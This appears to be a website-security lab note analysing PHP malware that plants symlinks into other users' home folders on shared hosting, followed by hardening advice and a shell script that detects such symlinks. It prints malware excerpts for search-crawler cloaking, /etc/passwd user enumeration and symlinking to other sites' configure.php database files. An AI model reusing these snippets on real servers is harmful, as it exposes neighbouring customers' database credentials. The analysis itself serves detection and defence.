Multiple UNIX users symbolic link injector

Labs Note

Recently we found a very interesting piece of malware that injects symbolic links into each and every Linux/UNIX home folder on the host. Once a website is infected, it uses the following code to hide from search-engine crawlers, so that the script can be triggered only by the attackers:

    if (!empty($_SERVER['HTTP_USER_AGENT'])) {
        $bot = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
        if (preg_match('/' . implode('|', $bot) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
    }

The malicious code also performs other checks, such as verifying whether the OS is Windows (where it may not work because of filesystem differences) and whether the symlink function is enabled in the PHP engine, i.e. not listed in disable_functions:

    if ($_POST["m"] && !$_POST["passwd"] == "") {
        $check = @ini_get("disable_functions");
        if (eregi("symlink", $check)) {
            die("<font color=13B8E6>Symlink is Disbled</font>");
        }

If the following conditions are met:

  • the User-Agent does not match a search engine;
  • the OS is Linux/UNIX based;
  • the PHP engine has the symlink function enabled;

the malware injects additional code into the .htaccess file to change your DirectoryIndex to Sux.html, which usually redirects to a defacement page.

Moreover, the attacker also has the capability of sending different $_POST requests in order to try to find the location of the /etc/passwd file.

    $etc_passwd = $_POST["passwd"];
    // split the posted /etc/passwd contents into lines (delimiter assumed to be "\n"; the extracted copy had lost it)
    $etc_passwd = explode("\n", $etc_passwd);
    foreach ($etc_passwd as $passwd) {
        $pawd = explode(":", $passwd);   // user:x:uid:gid:... -> take the user name
        $user = $pawd[0];

This technique is used because, if the infected server sits in a shared environment and the attackers have write permissions to the other users' directories, they can inject multiple symlinks into those directories and collect as many database configuration files and other sensitive data as they can:

    @symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
    @symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
    @symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');

If you don’t use symlinks, our recommendation would be to disable the PHP symlink function altogether (for example via disable_functions) – this way the script is ineffective. Also check the /home directory on your hosting for directories that are not known to you, and for files and folders that are not part of your website.
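As an added example, not code from the Sucuri note or from the malware, the following POSIX shell functions sweep a /home tree for the two artefacts described above: symlinks in one user's web root that resolve into another user's files, and .htaccess files that override DirectoryIndex. The constructed sample tree, the function names and the --demo flag are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not code from the Sucuri note or the malware: a defender-side
# sweep of a shared-hosting /home tree for symlinks that resolve into another
# user's files and for .htaccess files that override DirectoryIndex.

# Print "link -> target" for every symlink under HOME_ROOT/<user>/ whose
# canonical target lies outside that user's own home directory.
find_cross_user_symlinks() {
    home_root=$(readlink -f -- "$1")
    for home in "$home_root"/*/; do
        home=${home%/}
        find "$home" -type l 2>/dev/null | while IFS= read -r link; do
            target=$(readlink -f -- "$link") || continue
            case "$target" in
                "$home"/*) ;;   # resolves inside the owner's own home: fine
                *) printf '%s -> %s\n' "$link" "$target" ;;
            esac
        done
    done
}

# List .htaccess files under HOME_ROOT that set DirectoryIndex, the change the
# note says the script makes (pointing it at Sux.html).
find_directoryindex_overrides() {
    find "$1" -name .htaccess -type f -exec grep -il 'DirectoryIndex' {} +
}

# Constructed /home look-alike in a temp directory for a dry run: alice owns a
# shop config, bob's web root holds a symlink into it (the pattern from the
# note), plus a harmless intra-user link and a rogue .htaccess.
build_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/alice/public_html/includes" "$root/bob/public_html"
    echo "<?php \$db_password = 'constructed-sample';" > "$root/alice/public_html/includes/configure.php"
    echo "<?php echo 'index';" > "$root/bob/public_html/index.php"
    ln -s "$root/alice/public_html/includes/configure.php" "$root/bob/public_html/alice-shop.txt"
    ln -s "$root/bob/public_html/index.php" "$root/bob/public_html/home.php"
    printf 'DirectoryIndex Sux.html\n' > "$root/bob/public_html/.htaccess"
    printf '%s\n' "$root"
}

# Dry run against the constructed tree; on a real host call the two functions
# with /home instead.
if [ "${1:-}" = "--demo" ]; then
    sample=$(build_sample_tree)
    find_cross_user_symlinks "$sample"
    find_directoryindex_overrides "$sample"
    rm -rf "$sample"
fi
```

Only the symlink in bob's web root that points into alice's configure.php is reported; the intra-user home.php link is not.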

If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.
